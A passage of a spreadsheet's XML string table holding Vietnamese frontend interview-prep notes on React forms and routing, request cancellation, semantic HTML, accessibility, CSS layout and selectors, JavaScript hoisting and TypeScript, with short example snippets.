    <t>Bạn gõ tìm "A" -&gt; Mạng mất 3s. Bạn gõ tiếp "AB" -&gt; Mạng mất 1s. Kết quả của "AB" về trước, hiển thị lên màn hình. 2s sau, kết quả của "A" mới về và đè lên "AB". (Gõ "AB" nhưng lại ra kết quả của "A" -&gt; Lỗi logic!).</t>
  </si>
  <si>
    <t>AbortController / Request cancellation?</t>
  </si>
  <si>
    <t>Để giải quyết lỗi Race condition, ta dùng AbortController. Mỗi lần bạn gõ ký tự mới, hàm fetch trước đó sẽ nhận được "tín hiệu HỦY", cắt đứt kết nối mạng lập tức. Trong React Query, chỉ cần truyền cái signal vào Axios là nó tự lo vụ hủy này.</t>
  </si>
  <si>
    <t>// Ví dụ với Axios và React Query
useQuery({
  queryKey: ['search', tuKhoa],
  queryFn: ({ signal }) =&gt; axios.get('/api/search', { signal }) 
})</t>
  </si>
  <si>
    <t>Làm sao tránh lỗi "setState after unmount"?</t>
  </si>
  <si>
    <t>Nguyên nhân: Gọi API mất 5s. Nhưng mới 2s thì user bấm chuyển trang (Component bị hủy/unmount). Lúc 5s data về, code nhảy vào setState trên một Component đã chết -&gt; React (bản cũ) chửi và quăng Warning đỏ.</t>
  </si>
  <si>
    <t>Cách khắc phục: Hủy API bằng AbortController ở bước dọn dẹp (useEffect cleanup). Lưu ý: Từ React 18 trở đi, đội ngũ React đã tự động vô hiệu hóa cái Warning vô duyên này nên bạn không cần lo nữa.</t>
  </si>
  <si>
    <t>React Hook Form (RHF) là gì?</t>
  </si>
  <si>
    <t>Thư viện quản lý form hiện đại, hiệu năng cực cao. Nó sử dụng kỹ thuật Uncontrolled Form (dùng ref ngầm) để tránh việc cả form bị Re-render mỗi khi bạn gõ 1 ký tự.</t>
  </si>
  <si>
    <t>File upload xử lý thế nào?</t>
  </si>
  <si>
    <t>const formData = new FormData();
formData.append("avatar", fileInput.files[0]);
axios.post("/upload", formData);</t>
  </si>
  <si>
    <t>HTML chỉ lấy được thông tin file, không tự gửi file qua mạng được. Bạn phải nhét file vào đối tượng FormData của JS rồi mới gửi qua API.</t>
  </si>
  <si>
    <t>Dynamic fields và Field array là gì?</t>
  </si>
  <si>
    <t>Chức năng cho phép thêm/xóa Input động (Ví dụ: Form Tuyển dụng có nút bấm "Thêm trường Đại Học đã học"). React Hook Form có sẵn hook useFieldArray để quản lý mảng này cực kỳ mượt mà.</t>
  </si>
  <si>
    <t>Accessibility (a11y) trong form gồm gì?</t>
  </si>
  <si>
    <t>Form phải dùng được bằng bàn phím (Tab) và cho người khiếm thị dùng máy đọc màn hình:
Mọi  bắt buộc phải có  đi kèm (nối bằng thuộc tính htmlFor và id).</t>
  </si>
  <si>
    <t>Ô bị lỗi phải có thuộc tính aria-invalid="true".
Báo lỗi phải gắn bằng aria-describedby="error-text-id".</t>
  </si>
  <si>
    <t>import { useForm } from "react-hook-form";
import { zodResolver } from "@hookform/resolvers/zod";
import * as z from "zod";
// 1. Khai báo luật lệ bằng Zod
const schema = z.object({
  email: z.string().email({ message: "Email không hợp lệ" })
});
function DangKy() {
  // 2. Gắn Zod vào React Hook Form
  const { register, handleSubmit, formState: { errors, isSubmitting } } = useForm({
    resolver: zodResolver(schema)
  });
  const onSubmit = async (data) =&gt; {
    await fetch('/api/login', { method: 'POST', body: JSON.stringify(data) });
  };
  return (
    &lt;form onSubmit={handleSubmit(onSubmit)}&gt;
      &lt;label htmlFor="email"&gt;Email:&lt;/label&gt;
      {/* 3. Đăng ký input vào RHF (Tự động lo vụ onChange, Blur, Ref) */}
      &lt;input id="email" {...register("email")} aria-invalid={!!errors.email} /&gt;
      {/* 4. Hiển thị lỗi UX */}
      {errors.email &amp;&amp; &lt;p style={{ color: "red" }}&gt;⚠ {errors.email.message}&lt;/p&gt;}
      {/* 5. Khóa nút khi đang load */}
      &lt;button type="submit" disabled={isSubmitting}&gt;
        {isSubmitting ? "Đang gửi..." : "Đăng ký"}
      &lt;/button&gt;
    &lt;/form&gt;
  );
}</t>
  </si>
  <si>
    <t>. Client-side routing (CSR) là gì?</t>
  </si>
  <si>
    <t>Khi bạn bấm vào một đường link, trình duyệt KHÔNG tải lại trang (không chớp màn hình trắng).</t>
  </si>
  <si>
    <t>Thay vào đó, JavaScript sẽ chặn cú click, dọn dẹp các Component cũ và tự vẽ Component mới lên màn hình. Trải nghiệm mượt như App điện thoại.</t>
  </si>
  <si>
    <t>Server-side routing (SSR) là gì?</t>
  </si>
  <si>
    <t>Là cách điều hướng cổ điển (của PHP, Java, HTML cũ). Mỗi lần bạn bấm link, trình duyệt sẽ gửi yêu cầu lên Server, Server tạo ra 1 file HTML mới tinh và gửi về. Màn hình sẽ bị trắng 1 nhịp để tải lại toàn bộ.</t>
  </si>
  <si>
    <t>React Router là gì?</t>
  </si>
  <si>
    <t>Là thư viện tiêu chuẩn và phổ biến nhất để thực hiện Client-side routing trong React.</t>
  </si>
  <si>
    <t>BrowserRouter và HashRouter khác nhau thế nào?</t>
  </si>
  <si>
    <t>BrowserRouter: Dùng URL sạch (VD: shop.com/shoes). Nó cần Server cấu hình trỏ mọi request về file index.html.</t>
  </si>
  <si>
    <t>HashRouter: Dùng dấu thăng (VD: shop.com/#/shoes). Dùng khi bạn không thể can thiệp vào Server (VD: Deploy lên Github Pages).</t>
  </si>
  <si>
    <t>History API là gì?</t>
  </si>
  <si>
    <t>Là một API gốc của Trình duyệt (HTML5) giúp thay đổi đường dẫn URL mà không làm tải lại trang. Đây chính là "phép thuật" đứng sau BrowserRouter.</t>
  </si>
  <si>
    <t>. Xử lý 404 Route và Redirect?</t>
  </si>
  <si>
    <t>404 Route: Dùng đường dẫn path="*" (Bắt mọi URL rác) đặt ở cuối cùng của file cấu hình để hiển thị trang "Không tìm thấy".
Redirect (Chuyển hướng): Khi user vào /old-link, ta dùng  để đẩy họ sang trang mới.</t>
  </si>
  <si>
    <t>import { Routes, Route, Outlet, Navigate } from 'react-router-dom';
function MainLayout() {
  return (
    &lt;div&gt;
      &lt;Navbar /&gt; {/* Giao diện dùng chung */}
      &lt;Outlet /&gt; {/* Nơi các Route con sẽ xuất hiện */}
      &lt;Footer /&gt;
    &lt;/div&gt;
  );
}
// Cấu hình Route
&lt;Routes&gt;
  &lt;Route path="/" element={&lt;MainLayout /&gt;}&gt;
    &lt;Route index element={&lt;HomePage /&gt;} /&gt; {/* Index Route (Trang chủ) */}
    &lt;Route path="about" element={&lt;AboutPage /&gt;} /&gt; {/* Nested Route */}
  &lt;/Route&gt;
  &lt;Route path="/old" element={&lt;Navigate to="/" replace /&gt;} /&gt; {/* Redirect */}
  &lt;Route path="*" element={&lt;Page404 /&gt;} /&gt; {/* 404 Route bắt lỗi */}
&lt;/Routes&gt;</t>
  </si>
  <si>
    <t>Dynamic route và Route params là gì?</t>
  </si>
  <si>
    <t>Dynamic route là đường dẫn động có chứa tham số (Route params).</t>
  </si>
  <si>
    <t>VD: Khai báo path="/users/:id". Số :id này có thể là 1, 2, abc và ta sẽ lấy được nó ra để gọi API chi tiết của User đó.</t>
  </si>
  <si>
    <t>useParams dùng làm gì?</t>
  </si>
  <si>
    <t>Là Hook để lấy cái tham số :id ở trên ra xài. const { id } = useParams();</t>
  </si>
  <si>
    <t>Query params và useSearchParams?</t>
  </si>
  <si>
    <t>Query params là phần thông tin phụ nằm sau dấu chấm hỏi ? (VD: /shoes?color=red&amp;size=40).</t>
  </si>
  <si>
    <t>useSearchParams là Hook để lấy và sửa đoạn dữ liệu này (cách dùng giống hệt useState).</t>
  </si>
  <si>
    <t>useNavigate dùng làm gì?</t>
  </si>
  <si>
    <t>Dùng để chuyển trang bằng code JS thay vì dùng thẻ . (Ví dụ: Chờ API Submit form xong báo thành công thì navigate('/dashboard')).</t>
  </si>
  <si>
    <t>Protected route và Auth guard là gì?</t>
  </si>
  <si>
    <t>Là "Cổng bảo vệ". Bạn tạo ra một Component bao bọc lấy các trang quan trọng (như Trang Admin, Hồ sơ). Bên trong Component đó, bạn check: "Có token đăng nhập chưa?". Nếu Có: Cho phép đi qua (render ). Nếu Không: Đá văng ra trang Login ().</t>
  </si>
  <si>
    <t>// Ví dụ làm Auth Guard (Protected Route)
function RequireAuth({ children }) {
  const isLogin = localStorage.getItem('token');
  if (!isLogin) {
    return &lt;Navigate to="/login" replace /&gt;; // Đá về trang đăng nhập
  }
  return children; // Cho phép vào xem
}
// Cách bọc:
&lt;Route path="/admin" element={&lt;RequireAuth&gt;&lt;AdminPage /&gt;&lt;/RequireAuth&gt;} /&gt;</t>
  </si>
  <si>
    <t>Lazy route và Route-based code splitting là gì?</t>
  </si>
  <si>
    <t>Thay vì gom toàn bộ hàng chục trang Web vào một cục JS 5MB bắt người dùng tải lúc mới vào web. Ta dùng React.lazy().</t>
  </si>
  <si>
    <t>Khi đó, người dùng vào /trang-chu thì chỉ tải JS của trang chủ (khoảng 100KB). Bao giờ họ bấm sang /cai-dat, trình duyệt mới tiếp tục tải file JS của trang Cài đặt về. Điều này gọi là Cắt code theo từng Tuyến đường (Route-based code splitting).</t>
  </si>
  <si>
    <t>Scroll restoration là gì? (Phục hồi vị trí cuộn chuột)</t>
  </si>
  <si>
    <t>React Router mặc định khi bạn chuyển trang, thanh cuộn vẫn giữ nguyên ở vị trí cũ (nếu bạn đang cuộn ở dưới đáy thì sang trang mới bạn vẫn ở đáy).</t>
  </si>
  <si>
    <t>Scroll restoration là kỹ thuật xử lý để: Khi vào trang mới thì cuộn lên Top màn hình. Khi bấm nút "Back" quay lại trang danh sách cũ thì khôi phục lại đúng vị trí đang đọc dở. (React Router v6.4+ đã có Component  tự động làm việc này).</t>
  </si>
  <si>
    <t>Semantic HTML là gì? Code dễ đọc, dễ maintain hơn
Nhìn vào HTML là biết khu vực đó làm gì.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Là việc sử dụng các thẻ HTML mang ý nghĩa ngữ nghĩa rõ ràng thay vì các thẻ chung chung. Ví dụ: dùng &lt;header&gt;, &lt;nav&gt;, &lt;article&gt;, &lt;footer&gt; thay vì dùng một đống &lt;div&gt;. Điều này giúp máy tính (trình duyệt, bot tìm kiếm, trình đọc màn hình) hiểu được </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>mục đích</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> của từng khối nội dung.</t>
    </r>
  </si>
  <si>
    <t>Accessibility (hỗ trợ screen reader)
Đây là lý do rất quan trọng ở dự án lớn.
Người khiếm thị dùng screen reader có thể nhảy nhanh giữa các vùng:Header NavigationMain, content, Footer
Nếu dùng toàn div, screen reader không hiểu layout.</t>
  </si>
  <si>
    <t>SEO tốt hơn
Search engine như Google hiểu bố cục trang tốt hơn.
Ví dụ:&lt;main&gt; → nội dung chính, &lt;nav&gt; → menu điều hướng  ,  &lt;article&gt; → bài viết độc lập
&lt;footer&gt; → thông tin cuối trang
Google sẽ dễ phân tích content hơn so với một đống &lt;div&gt;.</t>
  </si>
  <si>
    <t>Khi nào dùng section vs article?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;article&gt;: Dùng cho nội dung độc lập, có ý nghĩa trọn vẹn dù tách rời khỏi trang web (VD: bài viết blog, bản tin, bài báo).
</t>
  </si>
  <si>
    <t>&lt;section&gt;: Dùng để nhóm các nội dung có chung một chủ đề lại với nhau, thường đi kèm với một tiêu đề (VD: &lt;h1&gt; - &lt;h2&gt;). Một &lt;article&gt; có thể chứa nhiều &lt;section&gt; và ngược lại.</t>
  </si>
  <si>
    <t>Accessibility là gì?</t>
  </si>
  <si>
    <t xml:space="preserve">Khả năng tiếp cận (viết tắt là a11y). Đây là việc thiết kế và lập trình website sao cho tất cả mọi người đều có thể sử dụng, bao gồm cả những người khuyết tật (khiếm thị, hạn chế vận động, mù màu...).
</t>
  </si>
  <si>
    <t>Người khiếm thị → dùng screen reader
Người khó nhìn → cần font lớn, contrast tốt
Người không dùng chuột được → dùng keyboard</t>
  </si>
  <si>
    <t>Accessibility giúp website usable cho tất cả nhóm này.Người bị mù màu
Người tay run, thao tác khó
Người dùng điện thoại ngoài trời sáng mạnh.</t>
  </si>
  <si>
    <t>Screen reader hoạt động thế nào?</t>
  </si>
  <si>
    <t>Trình đọc màn hình (Screen reader) là phần mềm quét qua Cây DOM (cấu trúc HTML) của trang web và chuyển đổi text, thẻ semantic, thuộc tính ARIA thành giọng nói (hoặc chữ nổi) để người khiếm thị có thể "nghe" và điều hướng được website.</t>
  </si>
  <si>
    <t>defer và async khác nhau thế nào?</t>
  </si>
  <si>
    <t>&lt;script src="app.js"&gt;&lt;/script&gt;Browser sẽ:
Parse HTML
Gặp &lt;script&gt;
Dừng parse HTML
Download JS
Execute JS
Parse tiếp HTML
=&gt; bị render blocking
Nếu file JS lớn thì web load chậm.</t>
  </si>
  <si>
    <t>&lt;script async src="app.js"&gt;&lt;/script&gt;Cách hoạt động
HTML vẫn parse tiếp
JS tải song song (parallel)
Tải xong là execute ngay lập tức
Có thể interrupt HTML parsing</t>
  </si>
  <si>
    <t>&lt;script defer src="app.js"&gt;&lt;/script&gt;Cách hoạt động
HTML parse tiếp
JS tải song song
Đợi parse HTML xong mới executeĐặc điểm
 tải song song
giữ đúng thứ tự script
chạy sau khi DOM sẵn sàng</t>
  </si>
  <si>
    <t>preload vs prefetch?</t>
  </si>
  <si>
    <t>preload: Chỉ thị cho trình duyệt tải ngay lập tức các tài nguyên chắc chắn sẽ cần trên trang hiện tại (VD: font chữ, ảnh nền hero, file CSS cốt lõi).</t>
  </si>
  <si>
    <t>prefetch: Chỉ thị tải ngầm các tài nguyên có thể sẽ cần ở các trang tiếp theo trong lúc trình duyệt đang rảnh rỗi (VD: file JS của trang thanh toán khi user đang ở trang giỏ hàng).</t>
  </si>
  <si>
    <t>ưu nhược của iframe?</t>
  </si>
  <si>
    <t>Nhược : Làm chậm tốc độ tải trang (vì phải tải một trang web hoàn toàn mới nhúng bên trong trang hiện tại).
Không tốt cho SEO (bot ít khi lập chỉ mục nội dung trong iframe).
Nguy cơ bảo mật (dễ bị tấn công Clickjacking hoặc chứa mã độc nếu nhúng nguồn không tin cậy, cần dùng thẻ sandbox để hạn chế).
Gây khó khăn cho Responsive thiết kế trên điện thoại.</t>
  </si>
  <si>
    <t>iframe mạnh ở isolation và embedding, nhưng đánh đổi bằng performance, SEO và khả năng integration.</t>
  </si>
  <si>
    <t>Ưu điểm Nhược điểm
Cô lập CSS/JS tốt || Performance nặng
Dễ embed bên thứ ba ||  SEO kém
Security tốt hơn với sandbox  ||  Responsive khó
Hỗ trợ microfrontend  ||  Khó giao tiếp DOM
Deploy độc lập  || Clickjacking risk
Tạo sandbox environment ||  UX không đẹp
 Debug khó
 Cookie/Auth phức tạp</t>
  </si>
  <si>
    <t>SSR HTML khác CSR HTML thế nào?</t>
  </si>
  <si>
    <t>SSR (Server-Side Rendering): Mã HTML được lắp ráp đầy đủ nội dung sẵn ở trên Server rồi mới gửi xuống trình duyệt. Người dùng thấy nội dung ngay. Tốt cho SEO.</t>
  </si>
  <si>
    <t>CSR (Client-Side Rendering): Server chỉ gửi xuống một file HTML trống rỗng (có một thẻ root &lt;div&gt;) kèm cục file JavaScript. Trình duyệt phải chạy file JS đó để vẽ ra (render) giao diện. Tải lần đầu chậm hơn nhưng sau đó chuyển trang cực kỳ mượt mà.</t>
  </si>
  <si>
    <t>Cookie vs LocalStorage vs SessionStorage?</t>
  </si>
  <si>
    <t>Tính chất</t>
  </si>
  <si>
    <t>Cookie</t>
  </si>
  <si>
    <t>LocalStorage</t>
  </si>
  <si>
    <t>SessionStorage</t>
  </si>
  <si>
    <t>Cookie = auth/session
LocalStorage = lưu lâu dài
SessionStorage = dữ liệu tạm theo tab</t>
  </si>
  <si>
    <t>Dung lượng</t>
  </si>
  <si>
    <t>Rất nhỏ (4KB)</t>
  </si>
  <si>
    <t>Lớn (khoảng 5MB)</t>
  </si>
  <si>
    <t>Vòng đời</t>
  </si>
  <si>
    <t>Theo thời gian thiết lập (Expiration)</t>
  </si>
  <si>
    <t>Lưu vĩnh viễn (đến khi xóa)</t>
  </si>
  <si>
    <t>Xóa ngay khi đóng tab/trình duyệt</t>
  </si>
  <si>
    <t>Mạng lưới</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Gửi kèm theo </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>mọi</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> HTTP request lên server</t>
    </r>
  </si>
  <si>
    <t>Không gửi lên server</t>
  </si>
  <si>
    <t>Ứng dụng</t>
  </si>
  <si>
    <t>Lưu token đăng nhập, tracking</t>
  </si>
  <si>
    <t>Lưu settings người dùng, giỏ hàng</t>
  </si>
  <si>
    <t>Lưu form đang nhập dở, state tạm thời</t>
  </si>
  <si>
    <t>Selector specificity?</t>
  </si>
  <si>
    <t>Độ ưu tiên của bộ chọn. Khi nhiều CSS cùng nhắm vào 1 phần tử, rule có specificity cao hơn sẽ thắng.</t>
  </si>
  <si>
    <t>Tính specificity: Theo trọng số [Inline] &gt; [ID] &gt; [Class, Pseudo-class, Attribute] &gt; [Element, Pseudo-element].</t>
  </si>
  <si>
    <t>!important có nên dùng?</t>
  </si>
  <si>
    <t>Rất hạn chế. Nó phá vỡ luồng ưu tiên tự nhiên (cascade) của CSS, làm code cực kỳ khó debug và bảo trì.</t>
  </si>
  <si>
    <t>Cascade là gì: "Dòng thác" - cơ chế giải quyết xung đột CSS. Nếu specificity bằng nhau, rule nào viết sau cùng (dưới cùng) sẽ thắng.</t>
  </si>
  <si>
    <t>initial vs inherit vs unset vs revert</t>
  </si>
  <si>
    <t>initial: Trả về giá trị mặc định của CSS spec.
inherit: Ép nhận giá trị của cha.</t>
  </si>
  <si>
    <t>unset: Nếu thuộc tính có thể kế thừa thì hoạt động như inherit, nếu không thì như initial.</t>
  </si>
  <si>
    <t>revert: Trả về style mặc định của trình duyệt (User Agent).</t>
  </si>
  <si>
    <t>content-box vs border-box</t>
  </si>
  <si>
    <t>content-box (mặc định): Kích thước bạn set (width/height) chỉ áp dụng cho Content. Thêm padding/border sẽ làm phần tử to ra</t>
  </si>
  <si>
    <t>border-box: Kích thước bạn set bao trùm cả Content + Padding + Border. Thêm padding không làm phần tử to ra.</t>
  </si>
  <si>
    <t>border-box: Giúp dễ dàng kiểm soát layout chính xác, không bị vỡ giao diện khi thêm padding hoặc viền.</t>
  </si>
  <si>
    <t>Block vs Inline vs Inline-block?</t>
  </si>
  <si>
    <t>block: Nằm trên một dòng riêng, chiếm full chiều ngang (VD: div, p</t>
  </si>
  <si>
    <t>inline: Nằm trên cùng một dòng, kích thước bọc vừa nội dung, không set được width/height/margin-top/bottom (VD: span, a).</t>
  </si>
  <si>
    <t>inline-block: Nằm trên cùng một dòng nhưng set được width/height (VD: button, img).</t>
  </si>
  <si>
    <t>display: none vs visibility: hidden?</t>
  </si>
  <si>
    <t>display: none xóa phần tử khỏi layout (không chiếm không gian).</t>
  </si>
  <si>
    <t>visibility: hidden làm phần tử tàng hình nhưng vẫn chiếm chỗ trống đó.</t>
  </si>
  <si>
    <t>opacity: 0 vs visibility: hidden?</t>
  </si>
  <si>
    <t>Cả 2 đều vô hình và chiếm chỗ. Nhưng opacity: 0 vẫn có thể click/hover được</t>
  </si>
  <si>
    <t>còn visibility: hidden thì không thể tương tác.</t>
  </si>
  <si>
    <t>Position?</t>
  </si>
  <si>
    <t>static: Mặc định, theo luồng tự nhiên.
relative: Dịch chuyển so với vị trí gốc của chính nó.
absolute: Dịch chuyển so với thẻ cha gần nhất có position khác static.</t>
  </si>
  <si>
    <t>fixed: Đứng im một chỗ so với cửa sổ trình duyệt (viewport) kể cả khi cuộn.
sticky: Hoạt động như relative, nhưng khi cuộn qua một ngưỡng nhất định thì biến thành fixed.</t>
  </si>
  <si>
    <t>z-index</t>
  </si>
  <si>
    <t>Quyết định thứ tự hiển thị đè lên nhau (trục Z). Phần tử có z-index lớn hơn sẽ nằm trên. Chỉ hoạt động với position khác static</t>
  </si>
  <si>
    <t>Làm layout responsive</t>
  </si>
  <si>
    <t>Sử dụng Media Queries, đơn vị linh hoạt (%, vw, rem), và các kỹ thuật auto của Flex/Grid.</t>
  </si>
  <si>
    <t>Mobile-first CSS: Code CSS mặc định cho màn hình nhỏ trước (mobile), sau đó dùng @media (min-width: ...) để ghi đè style cho màn hình lớn dần.</t>
  </si>
  <si>
    <t>Media query: Kỹ thuật áp dụng CSS theo điều kiện thiết bị (chiều rộng màn hình, chế độ sáng/tối...). VD: @media (max-width: 768px)</t>
  </si>
  <si>
    <t>Các đơn vị?</t>
  </si>
  <si>
    <t>px: Điểm ảnh tuyệt đối.
%: Tỷ lệ phần trăm so với phần tử cha.
vw/vh: Tỷ lệ % so với chiều rộng/chiều cao của trình duyệt (Viewport).</t>
  </si>
  <si>
    <t>em: Tỷ lệ theo font-size của phần tử cha.
rem: Tỷ lệ theo font-size của thẻ gốc (&lt;html&gt;).</t>
  </si>
  <si>
    <t>Khi nào dùng rem</t>
  </si>
  <si>
    <t>Dùng cho font-size, padding, margin để website dễ dàng scale (phóng to/thu nhỏ) khi người dùng thay đổi font chữ mặc định của trình duyệt, rất tốt cho Accessibility.</t>
  </si>
  <si>
    <t>Khi nào dùng clamp() ?</t>
  </si>
  <si>
    <t>Dùng khi muốn giá trị thay đổi mượt mà theo màn hình nhưng có giới hạn an toàn. Cú pháp clamp(MIN, LÝ TƯỞNG, MAX). Thường dùng cho Fluid Typography.</t>
  </si>
  <si>
    <t>h1 {
  font-size: clamp(24px, 5vw, 48px);
}</t>
  </si>
  <si>
    <t>Tối thiểu: 24px
Responsive theo màn hình: 5vw
Tối đa: 48px  clamp() = responsive value with min &amp; max limits</t>
  </si>
  <si>
    <t>Pseudo-class ?</t>
  </si>
  <si>
    <t>Lớp giả, nhắm mục tiêu vào một trạng thái cụ thể của phần tử (VD: :hover, :focus, :active).</t>
  </si>
  <si>
    <t>Pseudo-element ?</t>
  </si>
  <si>
    <t>Phần tử giả, nhắm mục tiêu vào một phần cụ thể của phần tử đó (VD: ::before tạo phần tử ảo phía trước, ::first-letter).</t>
  </si>
  <si>
    <t>:before vs ::before?</t>
  </si>
  <si>
    <t>Không khác biệt về chức năng. Dấu 1 chấm (:) là cú pháp CSS2 cũ, 2 chấm (::) là chuẩn CSS3 để phân biệt rạch ròi pseudo-element với pseudo-class. Trình duyệt hiện tại hỗ trợ cả hai.</t>
  </si>
  <si>
    <t>:nth-child()?</t>
  </si>
  <si>
    <t>Chọn phần tử con thứ N dựa trên thứ tự vị trí của nó trong danh sách các thẻ cùng chung thẻ cha (VD: :nth-child(even) chọn dòng chẵn).</t>
  </si>
  <si>
    <t>:not()?</t>
  </si>
  <si>
    <t>Bộ chọn phủ định. Áp dụng CSS cho tất cả các phần tử, ngoại trừ phần tử nằm trong :not() (VD: li:not(:last-child) để tạo border ngoại trừ dòng cuối).</t>
  </si>
  <si>
    <t>:has()</t>
  </si>
  <si>
    <t>(Mới/rất mạnh). Giúp chọn phần tử cha nếu nó chứa một phần tử con cụ thể (VD: a:has(img) sẽ chọn các thẻ &lt;a&gt; mà bên trong nó có chứa hình ảnh).</t>
  </si>
  <si>
    <t>CSS variable</t>
  </si>
  <si>
    <t>Biến CSS native (VD: --primary: red). Giúp lưu trữ giá trị và tái sử dụng.</t>
  </si>
  <si>
    <t>Animation vs Transition?</t>
  </si>
  <si>
    <t>Transition dùng để chuyển đổi mượt mà giữa 2 trạng thái (A sang B).button {
  background: blue;
  transition: 0.3s;
}
.button:hover {
  background: red;
}blue → red mượt trng 0.3s</t>
  </si>
  <si>
    <t>Animation dùng @keyframes để tạo chuỗi thay đổi phức tạp qua nhiều trạng thái (A -&gt; B -&gt; C -&gt; D), có thể chạy tự động không cần trigger.</t>
  </si>
  <si>
    <t>.loader {
  animation:
    spin 1s linear infinite;
}
@keyframes spin {
  from {
    transform: rotate(0);
  }
  to {
    transform: rotate(360deg);
  }
} xoay liên tục</t>
  </si>
  <si>
    <t>BEM?</t>
  </si>
  <si>
    <t>Block Element Modifier. Quy tắc đặt tên class siêu tường minh (VD: .card__title--active), giúp CSS dễ đọc và không bị conflict trong các dự án lớn.</t>
  </si>
  <si>
    <t>CSS Modules</t>
  </si>
  <si>
    <t>Kỹ thuật tự động băm (hash) các class name trong quá trình build thành những tên duy nhất (VD: _title_x2y3z), đảm bảo CSS chỉ tác dụng cục bộ (scoped) đúng vào component đó.</t>
  </si>
  <si>
    <t>CSS-in-JS</t>
  </si>
  <si>
    <t>Kỹ thuật viết CSS trực tiếp bằng JavaScript, gắn liền style vào các component (VD: Styled Components, Emotion trong React).</t>
  </si>
  <si>
    <t>Thư viện CSS-in-JS phổ biến
1. styled-components
Rất nổi tiếng.
const Card = styled.div`
  padding: 20px;
  border-radius: 12px;`;</t>
  </si>
  <si>
    <t>Hoisting và Temporal Dead Zone (TDZ) là gì?</t>
  </si>
  <si>
    <t>Hoisting (Kéo lên): Khi file JS chạy, trình duyệt sẽ "quét" một vòng và tự động kéo các phần khai báo biến lên đầu phạm vi của chúng.
Với var: Nó kéo lên và gán sẵn giá trị là undefined.
Với let/const: Nó có bị kéo lên, nhưng không được gán giá trị khởi tạo.</t>
  </si>
  <si>
    <t>Temporal Dead Zone (TDZ): Là "vùng chết tạm thời". Nó là khoảng không gian từ đầu khối mã cho đến dòng chữ khai báo let/const. Nếu bạn cố tình gọi biến trong vùng này, JS sẽ báo lỗi ngay lập tức.</t>
  </si>
  <si>
    <t>// --- HOISTING VỚI VAR ---
console.log(ten); // In ra: undefined (Không báo lỗi, vì var đã được hoist)
var ten = "Nam";
// --- TDZ VỚI LET/CONST ---
// console.log(tuoi); // LỖI: Cannot access 'tuoi' before initialization
// ^^^^^ Vùng TDZ của biến tuoi nằm ở đây ^^^^^
let tuoi = 25; 
console.log(tuoi); // 25 (Hết vùng TDZ)</t>
  </si>
  <si>
    <t>Primitive types (Tham trị) vs Reference types (Tham chiếu)</t>
  </si>
  <si>
    <t>Primitive (Nguyên thủy - Tham trị): Gồm String, Number, Boolean, null, undefined... Khi bạn copy biến nguyên thủy, JS sẽ tạo ra một bản sao hoàn toàn độc lập. Sửa bản sao không ảnh hưởng bản gốc.</t>
  </si>
  <si>
    <t>Reference (Tham chiếu): Gồm Object, Array, Function. Khi bạn gán 1 object cho 1 biến mới, JS không tạo bản sao, mà nó truyền địa chỉ ô nhớ. Cả 2 biến cùng trỏ về 1 chỗ. Đổi 1 cái là cái kia đổi theo!</t>
  </si>
  <si>
    <t>// --- PRIMITIVE (THAM TRỊ) ---
let a = 10;
let b = a;  // b copy giá trị 10 của a
b = 20;     // Đổi b
console.log(a); // 10 (a vẫn an toàn)
console.log(b); // 20
// --- REFERENCE (THAM CHIẾU) ---
let obj1 = { name: "John" };
let obj2 = obj1; // obj2 trỏ CÙNG VÀO ô nhớ của obj1
obj2.name = "Peter"; // Đổi thông tin qua obj2
console.log(obj1.name); // "Peter" (Bất ngờ chưa! obj1 cũng bị đổi theo vì dùng chung ổ nhớ)</t>
  </si>
  <si>
    <t>null vs undefined và lỗi typeof null</t>
  </si>
  <si>
    <t>undefined: Nghĩa là biến đã được tạo ra, nhưng bạn chưa cung cấp giá trị cho nó. Nó là trạng thái mặc định của hệ thống.
null: Nghĩa là "không có gì cả". Nhưng đây là trạng thái do chính lập trình viên chủ động gán để biểu thị giá trị rỗng.</t>
  </si>
  <si>
    <t>Vì sao typeof null === "object"?: Đây là một lỗi lịch sử của JavaScript từ ngày đầu tiên ra mắt. Lẽ ra nó phải là "null", nhưng người ta không thể sửa lỗi này vì sợ làm hỏng hàng triệu website cũ trên thế giới.</t>
  </si>
  <si>
    <t>console.log(diemThi); // undefined (Hệ thống tự gán vì bạn chưa cho giá trị)
let taiKhoanNganHang = null; 
console.log(taiKhoanNganHang); // null (Bạn chủ động nói rằng tài khoản này trống rỗng)
console.log(typeof undefined); // "undefined"
console.log(typeof null);      // "object" (Bug kinh điển của JS!)</t>
  </si>
  <si>
    <t>. == vs === và Type Coercion (Ép kiểu)</t>
  </si>
  <si>
    <t>TypeScript là gì?</t>
  </si>
  <si>
    <t>TypeScript là một ngôn ngữ lập trình mã nguồn mở do Microsoft phát triển. Nó là một "tập cha" (superset) của JavaScript. Điều này có nghĩa là bất kỳ code JS nào cũng là code TS hợp lệ, nhưng TS đắp thêm một lớp "Kiểu dữ liệu tĩnh" (Static Typing) lên trên. Cuối cùng, trình biên dịch (compiler) sẽ dịch TS ngược trở lại thành JS thuần để chạy trên trình duyệt.</t>
  </si>
  <si>
    <t>TypeScript khác JavaScript thế nào?</t>
  </si>
  <si>
    <t>JavaScript (Dynamic typing): Chỉ khi code đang chạy (runtime) nó mới biết biến đó là chuỗi hay số. Nếu sai kiểu, web sẽ crash (sập).</t>
  </si>
  <si>
